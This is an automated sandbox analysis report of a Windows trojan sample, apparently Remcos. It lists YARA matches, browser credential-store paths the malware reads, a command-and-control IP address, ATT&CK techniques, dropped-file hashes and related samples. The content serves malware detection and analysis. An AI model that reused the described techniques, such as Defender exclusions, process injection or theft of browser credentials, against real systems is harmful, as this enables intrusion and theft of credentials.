Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Queries volume information: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040A0B0 GetLocalTime,wsprintfW, 14_2_0040A0B0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004195F8 GetUserNameW, 14_2_004195F8
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004466BF _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 14_2_004466BF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 14_2_0040A953
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 14_2_0040AA71
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe Code function: \key3.db 14_2_0040AA71

          Remote Access Functionality

          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe Code function: cmd.exe 14_2_0040567A
MITRE ATT&CK Matrix (numbers in parentheses are the counts shown beside each technique in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (1); Command and Scripting Interpreter (1); Scheduled Task/Job (1); Service Execution (2); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading (1); Windows Service (1); Scheduled Task/Job (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Windows Service (1); Process Injection (122); Scheduled Task/Job (1); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (122)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); File and Directory Discovery (3); System Information Discovery (33); Security Software Discovery (121); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 1500386
Sample: SecuriteInfo.com.Win32.Malw...
Startdate: 28/08/2024
Architecture: WINDOWS
Score: 100

Root [2]: DNS/IP: geoplugin.net; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures; started: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe [8], bmkNCLNkqvOpVZ.exe [12]
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe [8]: dropped: C:\Users\user\AppData\...\bmkNCLNkqvOpVZ.exe (PE32); C:\...\bmkNCLNkqvOpVZ.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpB7C4.tmp (XML); SecuriteInfo.com.W...21416.15434.exe.log (ASCII); signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes; started: powershell.exe [14], SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe [17], schtasks.exe [20], SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe [22]
bmkNCLNkqvOpVZ.exe [12]: signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Machine Learning detection for dropped file; 4 other signatures; started: schtasks.exe [24], bmkNCLNkqvOpVZ.exe [26]
powershell.exe [14]: signatures: Loading BitLocker PowerShell Module; started: WmiPrvSE.exe [28], conhost.exe [30]
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe [17]: DNS/IP: 172.93.220.148, 45682, 49712, XTOM-AS-JPxTomJP, United States; geoplugin.net 178.237.33.50, 49714, 80, ATOM86-ASATOM86NL, Netherlands
schtasks.exe [20]: started: conhost.exe [32]
schtasks.exe [24]: started: conhost.exe [34]

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | 32% | Virustotal |
SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | 32% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
geoplugin.net | 1% | Virustotal |

Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/ | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://geoplugin.net/json.gpSystem32 | 0% | URL Reputation | safe
http://geoplugin.net/json.gpX | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gp:R | 0% | Avira URL Cloud | safe
http://geoplugin.net/h | 0% | Avira URL Cloud | safe
172.93.220.148 | 0% | Avira URL Cloud | safe
http://geoplugin.net/h | 0% | Virustotal |
http://geoplugin.net/json.gpX | 0% | Virustotal |
172.93.220.148 | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
172.93.220.148 | true | 1%, Virustotal; Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://geoplugin.net/json.gp:R | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpX | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/ | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/h | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, bmkNCLNkqvOpVZ.exe, 00000009.00000002.2152867062.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpSystem32 | SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D0F000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.93.220.148 | unknown | United States | 4785 | XTOM-AS-JPxTomJP | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1500386
Start date and time: 2024-08-28 11:37:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@18/12@1/2
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 188
• Number of non-executed functions: 193
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, PID 6864 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
05:37:55 | API Interceptor | 5407284x Sleep call for process: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe modified
05:37:57 | API Interceptor | 13x Sleep call for process: powershell.exe modified
05:37:59 | API Interceptor | 1x Sleep call for process: bmkNCLNkqvOpVZ.exe modified
11:37:57 | Task Scheduler | Run new task: bmkNCLNkqvOpVZ path: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
Match: 178.237.33.50
Associated Sample Name / URL | Detection | Threat Name | Context
PO_304234.xls | malicious | Remcos | geoplugin.net/json.gp
RFQ No. 109078906v.xla.xlsx | malicious | Remcos | geoplugin.net/json.gp
SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | geoplugin.net/json.gp
SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | geoplugin.net/json.gp
another.rtf | malicious | Remcos | geoplugin.net/json.gp
rnr.exe | malicious | Remcos | geoplugin.net/json.gp
thrylPXnvfySmGN.exe | malicious | Remcos | geoplugin.net/json.gp
SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | malicious | Remcos | geoplugin.net/json.gp
PRICE REQUEST RSM PQ24.docx.doc | malicious | Remcos | geoplugin.net/json.gp
Faktura.vbs | malicious | Remcos | geoplugin.net/json.gp

Match: geoplugin.net
Associated Sample Name / URL | Detection | Threat Name | Context
PO_304234.xls | malicious | Remcos | 178.237.33.50
RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 178.237.33.50
another.rtf | malicious | Remcos | 178.237.33.50
rnr.exe | malicious | Remcos | 178.237.33.50
thrylPXnvfySmGN.exe | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | malicious | Remcos | 178.237.33.50
PRICE REQUEST RSM PQ24.docx.doc | malicious | Remcos | 178.237.33.50
Faktura.vbs | malicious | Remcos | 178.237.33.50

Match: ATOM86-ASATOM86NL
Associated Sample Name / URL | Detection | Threat Name | Context
PO_304234.xls | malicious | Remcos | 178.237.33.50
RFQ No. 109078906v.xla.xlsx | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtf | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtf | malicious | Remcos | 178.237.33.50
another.rtf | malicious | Remcos | 178.237.33.50
rnr.exe | malicious | Remcos | 178.237.33.50
thrylPXnvfySmGN.exe | malicious | Remcos | 178.237.33.50
SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exe | malicious | Remcos | 178.237.33.50
PRICE REQUEST RSM PQ24.docx.doc | malicious | Remcos | 178.237.33.50
Faktura.vbs | malicious | Remcos | 178.237.33.50

Match: XTOM-AS-JPxTomJP
Associated Sample Name / URL | Detection | Threat Name | Context
DHL AWB 5596370080.exe | malicious | Remcos | 103.150.8.12
DHL SHIPPING DOC 5596370080.exe | malicious | Remcos | 103.150.8.12
AWB DHL 54900000789.exe | malicious | Remcos | 103.150.8.12
DHL AWB 8900893000.exe | malicious | Remcos | 103.150.8.12
SKM-2752024.exe | malicious | Remcos | 103.150.8.12
C4zDQjrSzj.elf | malicious | Unknown | 45.82.236.27
Quote List.exe | malicious | Remcos | 103.150.8.12
b1801e102f5cb5dce9e2628bd80932a39bd57ff68d32c824ad4443f7bd00ea2d_payload.exe | malicious | Remcos | 103.150.8.12
DHL AWB 890089300.exe | malicious | Remcos, PureLog Stealer | 103.150.8.12
DHL AWB DOCS 890089300.exe | malicious | Remcos | 103.150.8.12
          No context
          No context
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.34331486778365
          Encrypted:false
          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
          MD5:1330C80CAAC9A0FB172F202485E9B1E8
          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
          Malicious:true
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
          Process:C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.34331486778365
          Encrypted:false
          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
          MD5:1330C80CAAC9A0FB172F202485E9B1E8
          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
          Malicious:false
          Reputation:high, very likely benign file
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):962
          Entropy (8bit):5.013811273052389
          Encrypted:false
          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
          Malicious:false
          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):2232
          Entropy (8bit):5.380805901110357
          Encrypted:false
          SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
          MD5:16AD599332DD2FF94DA0787D71688B62
          SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
          SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
          SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
          Malicious:false
